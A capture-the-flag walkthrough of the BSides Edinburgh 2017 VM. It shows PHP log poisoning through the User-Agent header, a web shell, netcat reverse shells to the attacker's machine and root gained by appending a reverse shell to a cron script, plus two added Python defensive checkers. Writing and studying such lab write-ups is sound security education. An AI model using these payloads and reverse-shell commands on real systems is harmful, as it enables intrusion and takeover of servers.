- BSides Edinburgh 2017 CTF Walkthrough - https://maze.pentest-challenge.co.uk/ - DigiP
- Currently scanning: 192.168.7.0/16 | Screen View: Unique Hosts
- 277 Captured ARP Req/Rep packets, from 4 hosts. Total size: 16620
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.1.89 08:00:27:31:b6:3a 4 240 PCS Systemtechnik GmbH
- root@kali:~# nmap -sC -sV -T5 -v -p- --open -Pn --script vuln 192.168.1.89
- PORT STATE SERVICE VERSION
- 80/tcp open http Apache httpd 2.4.10 ((Debian))
- |_http-csrf: Couldn't find any CSRF vulnerabilities.
- |_http-dombased-xss: Couldn't find any DOM based XSS.
- | http-enum:
- | /manager/: Possible admin folder
- | /test.html: Test page
- | /test.php: Test page
- | /robots.txt: Robots file
- |_ /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
- |_http-server-header: Apache/2.4.10 (Debian)
- | http-slowloris-check:
- | VULNERABLE:
- | Slowloris DOS attack
- | State: LIKELY VULNERABLE
- | IDs: CVE:CVE-2007-6750
- | Slowloris tries to keep many connections to the target web server open and hold
- | them open as long as possible. It accomplishes this by opening connections to
- | the target web server and sending a partial request. By doing so, it starves
- | the http server's resources causing Denial Of Service.
- |
- | Disclosure date: 2009-09-17
- | References:
- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
- |_ http://ha.ckers.org/slowloris/
- |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
- MAC Address: 08:00:27:31:B6:3A (Oracle VirtualBox virtual NIC)
- /test.php has an interesting message.
- "Access Log (Cleared every 5 minutes):"
- Let's try storing some PHP. The home page reads our user agent. We add the following as our user agent,
- <?php system("ls -lashR /") ?>
- then visit /test.php
- As suspected, we get a listing of all the files on the system (that the current user can read).
- We find logs in http://192.168.1.89/9didkaskdhjdfh44/log.txt that contain our php code from our user agent.
- We put the following in to create our PHP payload in /uploads
- curl -v --user-agent '<?php system($_GET["cmd"]) ?>' http://192.168.1.89/
- /log.txt output:
- 192.168.1.66:<?php system("cp /var/www/html/9didkaskdhjdfh44/log.txt /var/www/html/uploads/foo.php") ?><br />192.168.1.66:<?php system($_GET["cmd"]) ?><br />
- Then navigate to test.php, and then /uploads/foo.php
- We can now send commands to this page without playing with our user agent.
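As an added example, not part of DigiP's writeup, a small Python checker for the log.txt layout above ("<client ip>:<user agent><br />") that flags entries a PHP include() would execute. The sample log is constructed: the two PHP entries are the payloads from this walkthrough, the browser and curl lines are made up. On the server side the fix is to never include() the log and to pass the User-Agent through htmlspecialchars() before writing it.

```python
import re

# Constructed sample in the CTF's log.txt layout ("<client ip>:<user agent><br />").
# The two PHP entries are the payloads from this walkthrough; the rest are made up.
SAMPLE_LOG = (
    '192.168.1.66:Mozilla/5.0 (X11; Linux x86_64) Firefox/52.0<br />'
    '192.168.1.66:<?php system("cp /var/www/html/9didkaskdhjdfh44/log.txt '
    '/var/www/html/uploads/foo.php") ?><br />'
    '192.168.1.66:<?php system($_GET["cmd"]) ?><br />'
    '192.168.1.70:curl/7.52.1<br />'
    '192.168.1.71:<?= shell_exec($_POST["c"]) ?><br />'
)

# Anything PHP's lexer treats as the start of code once the log is include()d.
PHP_OPEN_TAG = re.compile(r'<\?(php\b|=|\s)|<script\s+language\s*=\s*["\']?php', re.I)
# Functions that turn an executed log line into command or code execution.
DANGEROUS_CALLS = re.compile(
    r'\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert|base64_decode)\s*\(', re.I)
SUPERGLOBAL = re.compile(r'\$_(GET|POST|REQUEST|COOKIE|SERVER)\b')

def parse_log(text):
    """Split the log into (ip, user_agent) pairs; entries end in '<br />', not newlines."""
    entries = []
    for raw in text.split('<br />'):
        if raw.strip():
            ip, _, ua = raw.partition(':')  # the UA may itself contain ':'
            entries.append((ip.strip(), ua))
    return entries

def classify(user_agent):
    """Reasons a User-Agent looks like log poisoning; an empty list means benign."""
    reasons = []
    if PHP_OPEN_TAG.search(user_agent):
        reasons.append('php-open-tag')
    if DANGEROUS_CALLS.search(user_agent):
        reasons.append('dangerous-call')
    if SUPERGLOBAL.search(user_agent):  # payload expects to read a request parameter later
        reasons.append('superglobal')
    return reasons

def find_poisoned(text):
    """Entries that would run if test.php include()s the log instead of escaping it."""
    return [{'ip': ip, 'user_agent': ua, 'reasons': classify(ua)}
            for ip, ua in parse_log(text) if classify(ua)]

if __name__ == '__main__':
    for hit in find_poisoned(SAMPLE_LOG):
        print(hit['ip'], hit['reasons'], hit['user_agent'][:60])
```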
- view-source:http://192.168.1.89/uploads/foo.php?cmd=cat%20/etc/passwd
- (Edit: I copied foo.php to shell2.php, as the first time around I forgot about the log copying and it ended up wiping it out somehow with a blank file)
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- bin:x:2:2:bin:/bin:/usr/sbin/nologin
- sys:x:3:3:sys:/dev:/usr/sbin/nologin
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/usr/sbin/nologin
- man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
- lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
- mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
- news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
- uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
- proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
- www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
- backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
- list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
- irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
- nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
- systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
- systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
- systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
- Debian-exim:x:104:109::/var/spool/exim4:/bin/false
- messagebus:x:105:110::/var/run/dbus:/bin/false
- statd:x:106:65534::/var/lib/nfs:/bin/false
- ctfuser:x:1000:1000:ctfuser,,,:/home/ctfuser:/bin/bash
- mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
- sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
- r00t::0:0:0wned:/home/r00t:/bin/sh
- r00t::0:0:0wned:/home/r00t:/bin/sh
- There is an odd user (or users) in /etc/passwd called "r00t", spelled with zeros, not o's.
- root:x:0:
- daemon:x:1:
- bin:x:2:
- sys:x:3:
- adm:x:4:
- tty:x:5:
- disk:x:6:
- lp:x:7:
- mail:x:8:
- news:x:9:
- uucp:x:10:
- man:x:12:
- proxy:x:13:
- kmem:x:15:
- dialout:x:20:
- fax:x:21:
- voice:x:22:
- cdrom:x:24:ctfuser
- floppy:x:25:ctfuser
- tape:x:26:
- sudo:x:27:
- audio:x:29:ctfuser
- dip:x:30:ctfuser
- www-data:x:33:
- backup:x:34:
- operator:x:37:
- list:x:38:
- irc:x:39:
- src:x:40:
- gnats:x:41:
- shadow:x:42:
- utmp:x:43:
- video:x:44:ctfuser
- sasl:x:45:
- plugdev:x:46:ctfuser
- staff:x:50:
- games:x:60:
- users:x:100:
- nogroup:x:65534:
- input:x:101:
- systemd-journal:x:102:
- systemd-timesync:x:103:
- systemd-network:x:104:
- systemd-resolve:x:105:
- systemd-bus-proxy:x:106:
- crontab:x:107:
- netdev:x:108:ctfuser
- Debian-exim:x:109:
- messagebus:x:110:
- mlocate:x:111:
- ssh:x:112:
- ctfuser:x:1000:
- ssl-cert:x:113:
- mysql:x:114:
- We start a reverse shell with /bin/nc to our machine.
- We issue:
- cat /etc/issue;cat /etc/*ele*;uname -a
- The IP address assigned to the VM is \4{eth0}. Have fun!
- ██████╗ ███████╗███╗ ██╗████████╗███████╗███████╗████████╗
- ██╔══██╗██╔════╝████╗ ██║╚══██╔══╝██╔════╝██╔════╝╚══██╔══╝
- ██████╔╝█████╗ ██╔██╗ ██║ ██║ █████╗ ███████╗ ██║
- ██╔═══╝ ██╔══╝ ██║╚██╗██║ ██║ ██╔══╝ ╚════██║ ██║
- ██║ ███████╗██║ ╚████║ ██║ ███████╗███████║ ██║
- ╚═╝ ╚══════╝╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚══════╝ ╚═╝
- ██████╗████████╗███████╗
- ██╔════╝╚══██╔══╝██╔════╝
- ██║ ██║ █████╗
- ██║ ██║ ██╔══╝
- ╚██████╗ ██║ ██║
- ╚═════╝ ╚═╝ ╚═╝
- ██████╗ ██████╗ ██╗███████╗
- ╚════██╗██╔═████╗███║╚════██║
- █████╔╝██║██╔██║╚██║ ██╔╝
- ██╔═══╝ ████╔╝██║ ██║ ██╔╝
- ███████╗╚██████╔╝ ██║ ██║
- ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
- The IP address assigned to the VM is \4{eth0}. Have fun!
- PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
- NAME="Debian GNU/Linux"
- VERSION_ID="8"
- VERSION="8 (jessie)"
- ID=debian
- HOME_URL="http://www.debian.org/"
- SUPPORT_URL="http://www.debian.org/support"
- BUG_REPORT_URL="https://bugs.debian.org/"
- Linux ctf 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64 GNU/Linux
- I check netstat -antplu while in
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
- tcp 0 0 192.168.1.89:36495 192.168.1.66:443 ESTABLISHED 19102/sh
- tcp6 0 0 ::1:25 :::* LISTEN -
- tcp6 0 0 :::80 :::* LISTEN -
- tcp6 1 0 192.168.1.89:80 192.168.1.66:50218 CLOSE_WAIT -
- udp 0 0 0.0.0.0:68 0.0.0.0:* -
- udp 0 0 0.0.0.0:1203 0.0.0.0:* -
- udp6 0 0 :::45629 :::* -
- Let's get a proper tty
- python -c 'import pty; pty.spawn("/bin/sh")'
- www-data@ctf:/home/ctfuser$ cat clearlog.sh
- cat clearlog.sh
- #!/bin/sh
- echo '' > /var/www/html/9didkaskdhjdfh44/log.txt
- www-data@ctf:/home/ctfuser$
- We find the file that looks to be clearing the user agents from the log.txt file. If we can write to this file, we may be able to elevate to root.
- So far we can't write to the ctfuser file, so I looked for some other scripts with bad perms, but found none.
- www-data@ctf:/home/ctfuser$ find / ! -ls 2>/dev/null | grep "\.sh$" | grep rwxrwxrwx
- 5430 0 lrwxrwxrwx 1 root root 21 Feb 2 14:40 /etc/rcS.d/S17bootmisc.sh -> ../init.d/bootmisc.sh
- 5372 0 lrwxrwxrwx 1 root root 21 Jan 28 03:20 /etc/rcS.d/S09mountall.sh -> ../init.d/mountall.sh
- 5338 0 lrwxrwxrwx 1 root root 32 Jan 28 03:20 /etc/rcS.d/S08checkroot-bootclean.sh -> ../init.d/checkroot-bootclean.sh
- 5481 0 lrwxrwxrwx 1 root root 20 Jan 28 03:20 /etc/rcS.d/S05hwclock.sh -> ../init.d/hwclock.sh
- 5368 0 lrwxrwxrwx 1 root root 20 Jan 28 03:20 /etc/rcS.d/S07checkfs.sh -> ../init.d/checkfs.sh
- 5278 0 lrwxrwxrwx 1 root root 24 Jan 28 03:19 /etc/rcS.d/S01mountkernfs.sh -> ../init.d/mountkernfs.sh
- 5376 0 lrwxrwxrwx 1 root root 31 Jan 28 03:20 /etc/rcS.d/S10mountall-bootclean.sh -> ../init.d/mountall-bootclean.sh
- 5429 0 lrwxrwxrwx 1 root root 31 Feb 2 14:40 /etc/rcS.d/S14mountnfs-bootclean.sh -> ../init.d/mountnfs-bootclean.sh
- 5332 0 lrwxrwxrwx 1 root root 21 Jan 28 03:19 /etc/rcS.d/S01hostname.sh -> ../init.d/hostname.sh
- 5336 0 lrwxrwxrwx 1 root root 22 Jan 28 03:20 /etc/rcS.d/S06checkroot.sh -> ../init.d/checkroot.sh
- 5334 0 lrwxrwxrwx 1 root root 26 Jan 28 03:20 /etc/rcS.d/S04mountdevsubfs.sh -> ../init.d/mountdevsubfs.sh
- 5428 0 lrwxrwxrwx 1 root root 21 Feb 2 14:40 /etc/rcS.d/S13mountnfs.sh -> ../init.d/mountnfs.sh
- 5442 0 lrwxrwxrwx 1 root root 22 Jan 28 03:37 /etc/rc6.d/K05umountnfs.sh -> ../init.d/umountnfs.sh
- 5480 0 lrwxrwxrwx 1 root root 20 Jan 28 03:37 /etc/rc6.d/K07hwclock.sh -> ../init.d/hwclock.sh
- 5441 0 lrwxrwxrwx 1 root root 22 Jan 28 03:37 /etc/rc0.d/K05umountnfs.sh -> ../init.d/umountnfs.sh
- 5478 0 lrwxrwxrwx 1 root root 20 Jan 28 03:37 /etc/rc0.d/K07hwclock.sh -> ../init.d/hwclock.sh
- echo $PATH
- /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- www-data@ctf:/var/www/html/uploads$ env
- env
- APACHE_PID_FILE=/var/run/apache2/apache2.pid
- APACHE_RUN_USER=www-data
- APACHE_LOG_DIR=/var/log/apache2
- PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- PWD=/var/www/html/uploads
- APACHE_RUN_GROUP=www-data
- LANG=C
- SHLVL=1
- APACHE_LOCK_DIR=/var/lock/apache2
- APACHE_RUN_DIR=/var/run/apache2
- _=/usr/bin/env
- OLDPWD=/usr/share/gcc-4.9
- www-data@ctf:/var/www/html/uploads$
- find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
- -rwxrwxrwx 1 root root 26597 Apr 4 11:02 /var/www/html/pentest_logo.jpg
- -rwxrwxrwx 1 root root 4301 Apr 4 11:02 /var/www/html/minimal.css
- -rwxrwxrwx 1 root root 1667 Apr 5 17:26 /var/www/html/index.php
- -rwxrwxrwx 1 root root 35 Apr 6 13:41 /var/www/html/robots.txt
- www-data@ctf:/var/www/html$
- Not looking like any of these will be useful. index.php is owned by root, but will always execute as www-data unless called specifically by root. We'd need a root cron to run it for us, where we could then inject code to pop a shell as root, but no cron jobs to execute this file as root exist.
- Lost my shell at some point, fat fingered something probably.
- 192.168.1.89/uploads/shell2.php?cmd=nc 192.168.1.66 443 -e /bin/sh
- python -c 'import pty; pty.spawn("/bin/sh")';/bin/bash
- After a day of playing, looking for a hole or priv escalation, I missed captain obvious with regard to ctfuser.
- su ctfuser
- password? ctfuser
- :( wah wah wah
- su ctfuser
- su ctfuser
- Password: ctfuser
- ctfuser@ctf:/var/www/html/uploads$ id
- id
- uid=1000(ctfuser) gid=1000(ctfuser) groups=1000(ctfuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
- ctfuser@ctf:/var/www/html/uploads$ sudo -l
- sudo -l
- [sudo] password for ctfuser: ctfuser
- Sorry, user ctfuser may not run sudo on ctf.
- You have new mail in /var/mail/ctfuser
- ctfuser@ctf:/var/www/html/uploads$
- Interesting info in /var/mail/ctfuser
- Subject: Cron <root@ctf> /root/scripts/rangen.sh
- We start a local listener with nc -nlvp 4444 and then:
- echo -e 'nc -nv 192.168.1.66 4444 -e /bin/bash' >> clearlog.sh
- This script, if it's what I think it is, will run every 5 minutes, as stated on the test.php page we used to gain our www-data shell.
- If root starts this process, we should get a reverse shell as root.
- 5 minutes later, and we have root!
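The escalation above works because root's cron runs a script (clearlog.sh) that a low-privilege user can append to. As an added example that is not from the writeup, a Python audit that parses crontab lines, follows each job to its script and reports any that a non-owner could modify, or that does not exist yet; unlike the earlier grep for rwxrwxrwx, it uses os.stat so lrwxrwxrwx symlinks are not false positives. The crontab text and the two scripts created by build_demo() are a constructed fixture mirroring the box, not files from it.

```python
import os, re, stat, tempfile

# minute hour dom month dow (or @reboot etc.), then an optional user field and the command
CRON_LINE = re.compile(r'^\s*(?:@\w+|(?:\S+\s+){5})(?P<cmd>\S.*)$')

def script_of(command):
    """The script cron runs: first absolute path among the leading tokens (skips a user field)."""
    for token in command.split()[:2]:
        if token.startswith('/'):
            return token
    return None

def writable_by_non_owner(path):
    """True if the script or its directory has a group or world write bit (symlinks followed)."""
    return any(os.stat(p).st_mode & (stat.S_IWGRP | stat.S_IWOTH)
               for p in (path, os.path.dirname(path)))

def audit_crontab(text, root='/'):
    """(script, reason) for every entry whose script someone other than its owner could rewrite."""
    findings = []
    for line in text.splitlines():
        m = CRON_LINE.match(line)
        if not m or line.lstrip().startswith('#'):
            continue
        script = script_of(m.group('cmd'))
        if script is None:
            continue
        full = os.path.join(root, script.lstrip('/'))
        if not os.path.exists(full):
            findings.append((script, 'script missing; whoever can create it owns the job'))
        elif writable_by_non_owner(full):
            findings.append((script, 'script or its directory is group/world writable'))
    return findings

def build_demo():
    """Constructed fixture: a mode-777 clearlog.sh in a home dir and a 700 script under /root."""
    base = tempfile.mkdtemp()
    for rel, mode in (('home/ctfuser/clearlog.sh', 0o777), ('root/scripts/rangen.sh', 0o700)):
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), mode=0o755)
        with open(path, 'w') as f:
            f.write('#!/bin/sh\n')
        os.chmod(path, mode)
    crontab = '*/5 * * * * /home/ctfuser/clearlog.sh\n0 * * * * /root/scripts/rangen.sh\n'
    return base, crontab

if __name__ == '__main__':
    base, crontab = build_demo()
    for script, reason in audit_crontab(crontab, root=base):
        print(script, '->', reason)
```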
- python -c 'import pty; pty.spawn("/bin/sh")'
- # /bin/bash
- /bin/bash
- root@ctf:~# cd /root
- cd /root
- root@ctf:~# ls -la
- ls -la
- total 48
- drwx------ 2 root root 4096 Apr 6 12:57 .
- drwxr-xr-x 22 root root 4096 Jan 28 03:20 ..
- -rw------- 1 root root 183 Apr 6 13:55 .bash_history
- -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
- -r-x------ 1 root root 8096 Feb 24 21:32 flag-gen
- ---------- 1 root root 93 Apr 6 13:55 flag.txt
- -rw------- 1 root root 485 Feb 2 14:28 .mysql_history
- -rw------- 1 root root 27 Apr 6 13:55 .nano_history
- -rw-r--r-- 1 root root 140 Nov 19 2007 .profile
- ---------- 1 root root 451 Feb 2 13:43 public_key.pem
- -rw-r--r-- 1 root root 66 Jan 30 17:28 .selected_editor
- root@ctf:~# cat flag.txt
- cat flag.txt
- Please run the flag-gen binary in the /root/ folder to generate your unique flag. Well Done!
- root@ctf:~# ./flag-gen
- ./flag-gen
- Please supply your name as an argument.
- root@ctf:~# ./flag-gen xxDigiPxx
- ./flag-gen xxDigiPxx
- gAUfvCE50nYnABpAPClJtYdhQaLqB3n0oIb/pmaRxmOHm/8JM9nDPhPJrOUnnzUcHfHR5ewAIPGB
- EGVjsvPd7YYG9Do16xyTNbP5tfENe50OA7av4kkHUvYOhVgjQfn+RcCYJDUAj3xkA5nwg1DnIBjP
- WQcseAgMxnaFE50YJYEQAolWalanygEyNJUp/L2CQODR/KSgdacWBSjPL+zdCtbF5YPjsVHvlijX
- WJcNuIs7wlHysMsUadMahRffgSYhv0+gUs9VVT0CB7/2kqlg7CTivS9btjvXicrAN4Fv2Ma2l39I
- 7SWX6Yt3I/7U4VJXNoVSYUeBwrTTiCKu2dqgQA==
- root@ctf:~#
- During this CTF, I had tried way too many things, looking for various exploits for priv escalation and came up short. At the end of the day, the simplest of things came to bite me in the ass, as using the username as a password was something I should have tried as soon as I had gained my first tty session. Just goes to show that sometimes it's the little things we neglect that have the biggest impact. - DigiP